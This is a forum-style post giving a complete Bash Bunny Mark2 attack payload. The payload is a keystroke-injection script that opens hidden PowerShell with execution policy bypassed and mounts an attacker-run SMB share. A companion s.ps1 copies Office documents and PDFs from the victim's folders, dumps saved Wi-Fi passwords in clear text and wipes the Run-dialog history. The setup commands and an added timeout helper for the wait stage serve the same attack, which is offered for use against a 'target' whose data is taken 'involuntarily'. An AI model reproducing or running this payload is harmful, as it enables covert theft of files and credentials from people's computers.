
SMB Exfil to microSD (Mark2)


jblk01


Now you can involuntarily back up more of the target's data by writing it to the microSD card instead of the Bunny's internal storage.

 

Prerequisite:

 

SSH or serial into your Bunny MK2 and do the following:

 

'timedatectl set-time' followed by the current date (YYYY-MM-DD). Without a correct date the HTTPS downloads below fail certificate validation.

Run: 'apt update ; apt install gcc'

'cd /tools'

'wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz'

'tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/'

'rm -f impacket-0.9.19.tar.gz'

'cd impacket'

'pip install -r requirements.txt'

'cd ../'

'mkdir tmp'

'cd tmp'

'pip2 install setuptools-rust'

'pip2 install cryptography'

'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg'

'rm -f pyasn1-0.4.8-py2.7.egg'

'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz'

'tar -xzvf pycryptodomex-3.10.1.tar.gz'

'cd pycryptodomex-3.10.1 && python setup.py install'

'cd /tools/'

'rm -rf tmp/'

'cd impacket/ && python setup.py install'

 

Now on your microSD card, create the following directory structure:

 

/smb
|___loot/
|___s.ps1

 

Copy the following payload.txt into either switch 1 or switch 2:

 

######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION
# Mount SD as udisk
udisk mount

######## ETHERNET STAGE ########
LED STAGE1
# Start the SMB Server
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log &


######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
GET HOST_IP
LED STAGE2
ATTACKMODE HID RNDIS_ETHERNET
Q GUI r
Q DELAY 500
Q STRING cmd /C \"start /b powershell -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
Q ENTER
LED SPECIAL
# Wait until files are done copying
while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done


######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE
# Sync file system
sync
# Unmount the SD card
udisk unmount

######## FINISH ########
# Trap is clean
sync
LED FINISH
shutdown 0
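
As an added example (not part of jblk01's payload), here is a timeout-bounded version of the wait stage. The original 'while ! [ -f ... ]' loop spins forever if the target never runs s.ps1 (HID typing blocked, share unreachable, wrong switch position), leaving the SD card mounted and the LED stuck on SPECIAL. The directory argument stands in for /root/udisk/smb and the timeout is an assumed value; the functions use only standard shell tools, so they can be tried on any Linux box before being dropped into payload.txt in place of the loop under LED SPECIAL.

```bash
#!/bin/bash
# Added example, not the original payload's code: bounded wait for the
# EXFILTRATION_COMPLETE marker plus a loot count for the log.

# wait_for_marker DIR SECONDS
# Returns 0 as soon as DIR/EXFILTRATION_COMPLETE appears, 1 on timeout.
wait_for_marker() {
    local dir="$1" timeout="${2:-120}" waited=0
    while [ ! -f "$dir/EXFILTRATION_COMPLETE" ]; do
        if [ "$waited" -ge "$timeout" ]; then
            return 1
        fi
        sleep 1
        waited=$((waited + 1))
    done
    return 0
}

# count_loot DIR
# Prints the number of regular files under DIR/loot (0 if the tree is missing).
count_loot() {
    local dir="$1"
    find "$dir/loot" -type f 2>/dev/null | wc -l | tr -d ' '
}

# finish_stage DIR SECONDS
# Waits (bounded), prints a one-line status suitable for appending to
# smbserver.log, removes the marker and syncs. Returns 0 on success,
# 1 if the marker never appeared, so the payload can pick a different LED.
finish_stage() {
    local dir="$1" timeout="$2" rc=0
    if wait_for_marker "$dir" "$timeout"; then
        echo "exfil complete: $(count_loot "$dir") file(s) under $dir/loot"
    else
        echo "timeout after ${timeout}s: marker never appeared, $(count_loot "$dir") file(s) so far"
        rc=1
    fi
    rm -f "$dir/EXFILTRATION_COMPLETE"
    sync
    return $rc
}

# Usage inside payload.txt (assumed 120 s budget; /root/udisk/smb as on the Bunny):
#   if finish_stage /root/udisk/smb 120 >> /root/udisk/smb/smbserver.log; then
#       LED CLEANUP
#   else
#       LED FAIL
#   fi
```

In the payload the return code is what matters: on timeout you still want the unmount and shutdown to run so the card is left in a consistent state, but you do not want LED FINISH to claim success.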

 

Finally here is the s.ps1:

 

$exfil_dir="$Env:UserProfile\Downloads"
$exfil_dir1="$Env:UserProfile\Documents"
$exfil_dir2="$Env:UserProfile\Desktop"
$exfil_ext="*.doc*"
$exfil_ext1="*.pdf*"
$exfil_ext2="*.xls*"
$exfil_ext3="*.ppt*"
$loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
mkdir $loot_dir
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
robocopy $exfil_dir1 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
robocopy $exfil_dir2 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$loot_dir\$env:UserName".txt"
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

 

Now, eject the microSD card, insert it into your Bunny MK2, move the switch to the position whose payload.txt you populated, and plug the Bunny into a Windows 10 machine.

 

If done correctly, it should copy every file matching the patterns in s.ps1 (from the target's Downloads, Documents and Desktop folders) plus the saved Wi-Fi profiles to the microSD card. 🙂
